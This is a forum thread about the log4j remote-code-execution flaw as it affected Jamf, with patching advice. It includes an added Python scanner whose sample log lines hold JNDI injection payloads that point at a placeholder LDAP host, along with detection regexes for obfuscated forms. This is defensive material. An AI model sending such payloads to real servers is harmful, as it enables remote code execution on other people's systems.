RCE 0-day exploit found in log4j

Elies
New Contributor II

Hello everyone!
A zero-day exploit has been found which affects the latest version of Jamf.
https://www.lunasec.io/docs/blog/log4j-zero-day/

This exploit affects the Java logger log4j, which is used by Jamf. If you are hosting an on-premise version, take a look at the JSSAccess.log to check for anomalies.
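One way to run the JSSAccess.log check suggested in the post above, as an added example that is not part of the original thread or Jamf's tooling: a heuristic scan for log4j JNDI lookup strings, including URL-encoded and nested-lookup forms. The sample lines are constructed and do not reflect the real JSSAccess.log layout; the function names and the `example.invalid` host are assumptions.

```python
import re
import sys
from urllib.parse import unquote

# Direct form of the lookup string associated with the log4j flaw.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Innermost lookup such as ${lower:j}, ${::-j} or ${env:X:-j}; it resolves
# to the literal after its last colon, so that literal is substituted.
INNER = re.compile(r"\$\{[^{}$]*:-?([^{}$:]*)\}")

# Constructed sample lines (assumed layout, not Jamf's actual log format).
SAMPLE = [
    "2021-12-10 09:14:02 [INFO] Login succeeded user=admin ip=10.0.4.17",
    "2021-12-10 09:15:40 [WARN] Login failed user=${jndi:ldap://collector.example.invalid/a}",
    "2021-12-10 09:15:41 [WARN] Login failed user=${${lower:j}ndi:ldap://collector.example.invalid/a}",
    "2021-12-10 09:15:42 [WARN] Login failed user=%24%7Bjndi%3Aldap%3A%2F%2Fcollector.example.invalid%2Fa%7D",
    "2021-12-10 09:20:11 [INFO] Report template=${date:yyyy-MM} rendered",
]

def is_suspicious(line, max_rounds=8):
    """Return True if the line holds a JNDI lookup, plain or obfuscated."""
    text = line
    for _ in range(max_rounds):
        decoded = unquote(text)              # undo one layer of %-encoding
        if JNDI.search(decoded):
            return True
        collapsed = INNER.sub(r"\1", decoded)
        if collapsed == text:                # nothing left to decode or collapse
            return False
        text = collapsed
    return False                             # gave up after max_rounds passes

def scan(lines):
    """Return (line_number, line) pairs for every suspicious line."""
    return [(n, l.rstrip("\n")) for n, l in enumerate(lines, 1) if is_suspicious(l)]

if __name__ == "__main__":
    source = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE
    for number, line in scan(source):
        print(f"{number}: {line}")
```

A clean result does not prove the server was never probed, since a request may not have been logged in a form this pattern recognises.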


adrw
New Contributor II

A new, simpler to exploit, log4j vector using websockets and not much more than a normal page load.

https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/ 

 

Remediation advice is the same as before: patch log4j to 2.16 and monitor in/out requests.

donmontalvo
Esteemed Contributor III

Ok, ok, I didn't really want to go to the movies tonight.

Jamf Pro 10.34.2, here I come.

--
https://donmontalvo.com

adrw
New Contributor II

You bet, we're all eagerly waiting.

I'd rather patch Jamf to 10.34.2 with the log4j patch included than patch log4j in isolation.